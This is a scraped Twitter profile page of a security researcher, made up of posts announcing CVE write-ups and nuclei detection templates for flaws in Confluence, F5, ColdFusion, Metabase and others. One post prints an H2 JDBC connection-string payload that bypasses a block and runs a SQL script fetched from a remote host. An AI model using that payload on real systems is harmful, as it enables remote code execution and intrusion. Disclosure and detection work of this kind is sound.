Rahul Maini(@iamnoooob) 's Twitter Profileg
Rahul Maini

@iamnoooob

Research at @httpvoid0x2f @pdiscoveryio

ID:2897791291

linkhttps://blog.noob.ninja/ calendar_today12-11-2014 17:35:54

764 Tweets

14,1K Followers

2,3K Following

pwnmachine(@princechaddha) 's Twitter Profile Photo

I'm thrilled to announce the release of Nuclei Templates v9.8.5!

This latest version includes some fantastic new AWS cloud review templates. Now, both companies and pentesters can use Nuclei to review AWS cloud configurations effectively.

Check it out and let me know what you…

I'm thrilled to announce the release of Nuclei Templates v9.8.5! This latest version includes some fantastic new AWS cloud review templates. Now, both companies and pentesters can use Nuclei to review AWS cloud configurations effectively. Check it out and let me know what you…
account_circle
HTTPVoid(@httpvoid0x2f) 's Twitter Profile Photo

Check out our new blog post! We hacked into Apple Travel Portal (yes, again!) using a 0-day Remote Code Execution exploit. Part 1 is live now, stay tuned for the follow-up on another RCE worth a total bounty of $40k!

blog.projectdiscovery.io/hello-lucee-le…

account_circle
ProjectDiscovery.io(@pdiscoveryio) 's Twitter Profile Photo

🚀 Just released our in-depth analysis of CVE-2023-22527, a critical RCE vulnerability in Atlassian Confluence Data Center & Server. 🛡️ Don't miss out on our findings and learn how to detect and protect your systems! 🔍 blog.projectdiscovery.io/atlassian-conf…

account_circle
Michael Weber(@BouncyHat) 's Twitter Profile Photo

Given that nuclei has posted a full PoC for CVE-2023-46747, we're sharing the full F5 RCE blog post now. Link is praetorian.com/blog/refresh-c…. Shout outs to Rahul Maini Harsh Jaiswal for getting the PoC in < 72 hours and to OrangeTsai for the inspiration!

account_circle
nuclei(@pdnuclei) 's Twitter Profile Photo

Scan for F5 BIG-IP - Unauthenticated RCE via AJP Smuggling (CVE-2023-46747) using nuclei templates shared by Rahul Maini Harsh Jaiswal

Template - github.com/projectdiscove…

Analysis - praetorian.com/blog/refresh-c… by Praetorian

Advisory - my.f5.com/manage/s/artic……

Scan for F5 BIG-IP - Unauthenticated RCE via AJP Smuggling (CVE-2023-46747) using nuclei templates shared by @iamnoooob @rootxharsh Template - github.com/projectdiscove… Analysis - praetorian.com/blog/refresh-c… by @praetorianlabs Advisory - my.f5.com/manage/s/artic……
account_circle
s1r1us | Mohan Sri Rama Krishna Pedhapati(@S1r1u5_) 's Twitter Profile Photo

Here is the blog post for

CVE-2023-22515: Broken Access Control Vulnerability in Confluence Data Center and Server

I've left two challenges in it, try to solve them. If you solve second one, that would be a 0-day 😅

blog.s1r1us.ninja/research/broke…

account_circle
ProjectDiscovery.io(@pdiscoveryio) 's Twitter Profile Photo

🎊 ProjectDiscovery Cloud Platform is here! 🎊

Formerly Nuclei Cloud, it's got a new name and is now available for GA!

Head to nux.gg/PDCP_A and read about ProjectDiscovery Cloud Platform!

Template writing, vulnerability scanning, and so much more!

account_circle
HTTPVoid(@httpvoid0x2f) 's Twitter Profile Photo

Plenty of ways to RCE, another way to bypass the INIT key block for the h2 engine is using an escape character:

mem:;\INIT=RUNSCRIPT FROM 'htttp://rce/poc.sql'//\;

Great find!

account_circle
shubs(@infosec_au) 's Twitter Profile Photo

The security research team at Assetnote found and reported a critical pre-auth RCE vulnerability to Metabase earlier this month CVE-2023-38646:

blog.assetnote.io/2023/07/22/pre…

This one was an incredibly fun discovery as there are many roads to RCE through JDBC. We've published details…

The security research team at @assetnote found and reported a critical pre-auth RCE vulnerability to Metabase earlier this month CVE-2023-38646: blog.assetnote.io/2023/07/22/pre… This one was an incredibly fun discovery as there are many roads to RCE through JDBC. We've published details…
account_circle
HTTPVoid(@httpvoid0x2f) 's Twitter Profile Photo

⚠ Multiple RCEs, CVEs, and Confusions. Discover the roller coaster ride of vulnerabilities, patch bypasses, and uncover the story behind the temporary take down of our blog! Read now - nux.gg/adobe-coldfusi…
-2023-29300 -2023-38203 -2023-38204

⚠ Multiple RCEs, CVEs, and Confusions. Discover the roller coaster ride of vulnerabilities, patch bypasses, and uncover the story behind the temporary take down of our blog! Read now - nux.gg/adobe-coldfusi… #AdobeColdFusion #CVE-2023-29300 #CVE-2023-38203 #CVE-2023-38204
account_circle
ProjectDiscovery.io(@pdiscoveryio) 's Twitter Profile Photo

🔐 What a week in ! We accidentally published a 0-day, quickly pulled it at Adobe's request, and now, with Adobe's hard work, the issue is finally fixed.

🛠️ We're bringing our blog post back online to share our journey with CVE-2023-29300 and its patches. Curious…

🔐 What a week in #cybersecurity! We accidentally published a 0-day, quickly pulled it at Adobe's request, and now, with Adobe's hard work, the issue is finally fixed. 🛠️ We're bringing our blog post back online to share our journey with CVE-2023-29300 and its patches. Curious…
account_circle
Rahul Maini(@iamnoooob) 's Twitter Profile Photo

Interestingly JdbcRowSetImpl technique didn't work for us in the latest version of Java. Curious to know if there are some other setter methods that could be called in JDK/Common libraries that can achieve code execution with/without relying on JNDI. Any insights? 🤔

account_circle
ProjectDiscovery.io(@pdiscoveryio) 's Twitter Profile Photo

📚 Dive into our new blog analyzing the Adobe ColdFusion Pre-Auth Remote Code Execution vulnerability (CVE-2023-29300).

Visit 👉 blog.projectdiscovery.io/adobe-coldfusi…

Also, check out our nuclei template for effective vulnerability detection.

📚 Dive into our new blog analyzing the Adobe ColdFusion Pre-Auth Remote Code Execution vulnerability (CVE-2023-29300). Visit 👉 blog.projectdiscovery.io/adobe-coldfusi… Also, check out our @pdnuclei template for effective vulnerability detection. #AdobeColdFusion #Cybersecurity #CVEanalysis…
account_circle
ProjectDiscovery.io(@pdiscoveryio) 's Twitter Profile Photo

📚 Learn about the MOVEit Transfer SQL Injection vulnerability (CVE-2023-36934) in our latest blog.

Plus, we've also released nuclei template to detect and aid quick mitigation.

blog.projectdiscovery.io/moveit-transfe…

📚 Learn about the MOVEit Transfer SQL Injection vulnerability (CVE-2023-36934) in our latest blog. Plus, we've also released @pdnuclei template to detect and aid quick mitigation. blog.projectdiscovery.io/moveit-transfe… #MOVEit #Cybersecurity #hackwithautomation
account_circle
SinSinology(@SinSinology) 's Twitter Profile Photo

🚨 Here is the and technical detail for the CVE-2023-20887 Pre-Authenticated Remote Code Execution in vRealize Network Insight.
summoning.team/blog/vmware-vr…

🚨 Here is the #Exploit and technical detail for the CVE-2023-20887 Pre-Authenticated Remote Code Execution in #VMWare vRealize Network Insight. summoning.team/blog/vmware-vr…
account_circle
nuclei(@pdnuclei) 's Twitter Profile Photo

We're launching a new video series, “Nuclei Fundamentals” today!

In the first installment, we'll introduce you to the power of nuclei and nuclei templates. Check it out!



youtube.com/watch?v=b5qMyQ…

We're launching a new video series, “Nuclei Fundamentals” today! In the first installment, we'll introduce you to the power of nuclei and nuclei templates. Check it out! #hackwithautomation #pdteam youtube.com/watch?v=b5qMyQ…
account_circle
Electrovolt Security(@ElectrovoltSec) 's Twitter Profile Photo

We are thrilled to announce that Electrovolt is joining forces with the Cure53 to provide a variety of application security services.

Learn More at volt.cure53.de

account_circle